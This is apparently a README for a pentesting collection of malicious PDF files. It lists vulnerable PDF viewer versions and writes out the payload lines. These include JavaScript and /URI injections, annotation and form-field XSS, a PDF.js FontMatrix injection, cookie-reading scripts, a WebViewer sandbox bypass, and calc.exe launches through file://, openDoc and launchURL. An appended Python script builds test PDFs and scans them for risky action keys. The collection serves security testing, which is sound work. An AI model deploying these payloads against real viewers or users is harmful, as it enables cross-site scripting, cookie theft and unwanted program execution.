PayloadsAllThePDFs
PDF Files for Pentesting
Payloads All The PDFs
<a href="https://twitter.com/intent/follow?screen_name=evaristegal0is"><img src="https://img.shields.io/twitter/follow/evaristegal0is?style=social" alt="Follow @evaristegal0is"></a>
A list of crafted malicious PDF files to test the security of PDF readers and tools.
Write-Up: JavaScript-based PDF Viewers, Cross Site Scripting, and PDF files
Vulnerabilities found
- Foxit PDF SDK For Web 7.5.0 (~600 weekly downloads)
- PDFTron WebViewer 7.2.0, 7.3.1, 8.6.1, 10.1.0, 10.7.2, 10.12.0 (~87k weekly downloads)
- PSPDFKit for Web 2021.4.1 (~13k weekly downloads)
- Syncfusion ej2-pdfviewer 20.2.40 (~6.8k weekly downloads)
- React PDF viewer 3.6.0 (~34k weekly downloads)
- PDF.js 4.1.392 (~2 million weekly downloads)
Payloads list
payload1.pdf
Line 31. Understand if Acrobat Javascript APIs are supported.
/JS (app.alert\(1\); Object.getPrototypeOf(function*(){}).constructor = null; ((function*(){}).constructor("document.write('<script>confirm(document.cookie);</script><iframe src=https://14.rs>');"))().next();)
Line 69. Try to run arbitrary Javascript abusing the data URI scheme.
/URI (data:text/html,<script>alert\(2\);</script>)
Line 177. Try to inject Javascript code using annotations. The /T (title) entry carries the payload as a plain literal string; the /Contents entry carries the same payload as a UTF-16BE text string, so it starts with the FE FF byte order mark (shown below as ��) and every ASCII character is preceded by a NUL byte (shown as ^@).
<</Type /Annot /Rect [284.7745656638 581.6814031126 308.7745656638 605.6814031126 ] /Subtype /Text /M (D:20210402013803+02'00) /C [1 1 0 ] /Popup 15 0 R /T (\">'><details open ontoggle=confirm\(3\)>) /P 6 0 R /Contents (��^@"^@>^@'^@>^@<^@d^@e^@t^@a^@i^@l^@s^@ ^@o^@p^@e^@n^@ ^@o^@n^@t^@o^@g^@g^@l^@e^@=^@c^@o^@n^@f^@i^@r^@m^@\(^@'^@X^@S^@S^@'^@\)^@>) >>
payload2.pdf
Line 69. Try to inject HTML/Javascript when the /URI string is inserted into the viewer's page unescaped (an attribute breakout rather than a data: URI).
/URI (\">'><details open ontoggle=confirm\(2\)>)
payload3.pdf
Line 31. Understand if the PDF reader or tool runs arbitrary Javascript bypassing the Acrobat APIs.
/JS (app.alert\(1\); confirm\(2\); prompt\(document.cookie\); document.write\("<iframe src='https://14.rs'>"\);)
Line 69. Try to launch a local executable on Windows (calc.exe) through a file:// URI.
/URI (file:///C:/Windows/system32/calc.exe)
payload4.pdf
Line 31. Try to launch a local executable on Windows by abusing the Acrobat app.openDoc Javascript API.
/JS (app.alert\(1\); app.openDoc("/C/Windows/System32/calc.exe");)
Line 69. Try to launch a local executable on Windows through a /URI action whose value is a shell command rather than a URL.
/URI (START C:/\Windows/\system32/\calc.exe)
payload5.pdf
Line 31. Try to launch a local executable on Windows, and then a javascript: URL, by abusing the Acrobat app.launchURL Javascript API.
/JS (app.alert\(1\); app.launchURL\("START C:/\Windows/\system32/\calc.exe", true\); app.launchURL\("javascript:confirm\(3\);", true\);)
Line 69. Try to run arbitrary Javascript abusing the javascript: URI scheme.
/URI (javascript:confirm\(2\);)
payload6.pdf
Line 31. Try to launch a local executable on Windows, and then inject HTML, by abusing the Acrobat app.launchURL Javascript API.
/JS (app.alert\(1\); app.launchURL\("/C/Windows/system32/calc.exe", true\); app.launchURL\("'><details open ontoggle=confirm\(3\);", true\);)
payload7.pdf
Line 50. Try to run arbitrary Javascript injected via a /V (field value) entry. It works on vulnerable Apryse WebViewer versions.
/V (">'></div><details/open/ontoggle=confirm(document.cookie)></details>)
payload8.pdf
Line 19. Try to run arbitrary Javascript injected through the /FontMatrix array of a Type1 font dictionary. It works on vulnerable PDF.js versions. Proof-of-Concept created by Rob Wu and Thomas Rinsma.
<< /BaseFont /SNCSTG+CMBX12 /FontDescriptor 6 0 R /FontMatrix [ 1 2 3 4 5 (1\); alert\('origin: '+window.origin+', pdf url: '+\(window.PDFViewerApplication?window.PDFViewerApplication.url:document.URL\)) ] /Subtype /Type1 /Type /Font >>
payload9.pdf
Line 32. Javascript sandbox bypass in Apryse WebViewer SDK (10.9.x - 10.12.0) to run arbitrary embedded Javascript in PDFs.
/JS (app.alert\(1\); console.println\(delete window\); console.println\(delete confirm\); console.println\(delete document\); window.confirm\(document.cookie\);)
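The payloads above share two carriers: a /JS action string (payload1, payload3 to payload6, payload9) and a /URI action (payload1 to payload5), plus one annotation whose /Contents is UTF-16BE encoded (payload1). The Python script below is an added example and is not code from the PayloadsAllThePDFs repository: it builds a minimal, uncompressed PDF from those same carriers, shows the literal-string escaping that explains the `\(` and `\)` in the list and the BOM-prefixed UTF-16BE form of payload1's /Contents, and runs a byte-level triage scan that counts action keys and classifies /URI schemes (it generalises beyond the data: case in the list to javascript:, file: and scheme-less values). The object layout, rectangle numbers, the `RISKY_KEYS`/`SAFE_SCHEMES` lists and the function names are the example's own choices; key names follow the PDF specification.

```python
import re

# Constructed triage lists for this example. Real readers honour more action
# types (e.g. /SubmitForm, /ImportData); these are the ones the payload list exercises.
RISKY_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/URI")
SAFE_SCHEMES = {"http", "https", "mailto"}
# Captures the scheme of a /URI literal string, if the value has one at all.
URI_RE = re.compile(rb"/URI\s*\(\s*(?:([A-Za-z][A-Za-z0-9+.\-]*):)?")


def pdf_literal(raw: bytes) -> bytes:
    """Wrap raw bytes as a PDF literal string. Backslash and parentheses
    must be escaped, which is why the payloads above read confirm\\(2\\)."""
    escaped = raw.replace(b"\\", b"\\\\").replace(b"(", b"\\(").replace(b")", b"\\)")
    return b"(" + escaped + b")"


def pdf_string(s: str) -> bytes:
    """Latin-1 literal string, the form used by the /JS and /URI payloads."""
    return pdf_literal(s.encode("latin-1"))


def pdf_text_string(s: str) -> bytes:
    """UTF-16BE text string with a FE FF byte order mark, the form used by the
    annotation /Contents in payload1.pdf: each ASCII char becomes a NUL byte
    followed by the char, and 0x28/0x29/0x5C low bytes are still escaped."""
    return pdf_literal(b"\xfe\xff" + s.encode("utf-16-be"))


def decode_text_string(literal: bytes) -> str:
    """Inverse of the two encoders above. Only the three escapes the encoders
    emit are undone; \\n, \\r, octal escapes etc. are out of scope here."""
    if not (literal.startswith(b"(") and literal.endswith(b")")):
        raise ValueError("not a literal string")
    raw = re.sub(rb"\\([()\\])", rb"\1", literal[1:-1])
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be")
    return raw.decode("latin-1")  # PDFDocEncoding treated as Latin-1 (assumption)


def build_pdf(js=None, uri=None) -> bytes:
    """Minimal single-page PDF. js (str) becomes a catalog /OpenAction
    JavaScript action; uri (str) becomes a /Link annotation /URI action.
    Objects are written uncompressed so the scanner below can see them."""
    catalog = b"<< /Type /Catalog /Pages 2 0 R"
    if js is not None:
        catalog += b" /OpenAction << /S /JavaScript /JS " + pdf_string(js) + b" >>"
    objs = [catalog + b" >>", b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>"]
    page = b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200]"
    if uri is not None:
        objs.append(page + b" /Annots [4 0 R] >>")
        objs.append(b"<< /Type /Annot /Subtype /Link /Rect [20 20 180 180]"
                    b" /A << /S /URI /URI " + pdf_string(uri) + b" >> >>")
    else:
        objs.append(page + b" >>")
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))  # byte offset of "N 0 obj", recorded in the xref table
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objs) + 1, xref_pos))
    return bytes(out)


def scan_pdf(data: bytes) -> dict:
    """Byte-level triage: count action keys and classify /URI schemes.
    It does not inflate object streams or FlateDecode'd content, so a clean
    result from this function is not proof of a clean file."""
    keys = {k.decode(): len(re.findall(re.escape(k) + rb"\b", data)) for k in RISKY_KEYS}
    schemes = []
    for m in URI_RE.finditer(data):
        schemes.append(m.group(1).decode("latin-1").lower() if m.group(1) else None)
    suspicious = [s for s in schemes if s not in SAFE_SCHEMES]  # None = no scheme at all
    return {"keys": keys, "uri_schemes": schemes, "suspicious_uris": suspicious}


if __name__ == "__main__":
    # Constructed sample in the shape of payload1.pdf lines 31 and 69.
    sample = build_pdf(js="app.alert(1);", uri="data:text/html,<script>alert(2);</script>")
    print(scan_pdf(sample))
    print(pdf_text_string("\">'><details open ontoggle=confirm('XSS')>"))
```

Run it as a script to see the scan result and the NUL-interleaved form of the annotation payload; a scheme of `None` in `suspicious_uris` is what the `START C:/...` style values from payload4.pdf and payload5.pdf produce, since they are not URLs at all.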

If you want to support me you can offer me a coffee ☕</br></br> <a href="https://www.buymeacoffee.com/gubello" target="_blank"><img src="https://bmc-cdn.nyc3.digitaloceanspaces.com/BMC-button-images/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: auto !important;width: auto !important;" ></a>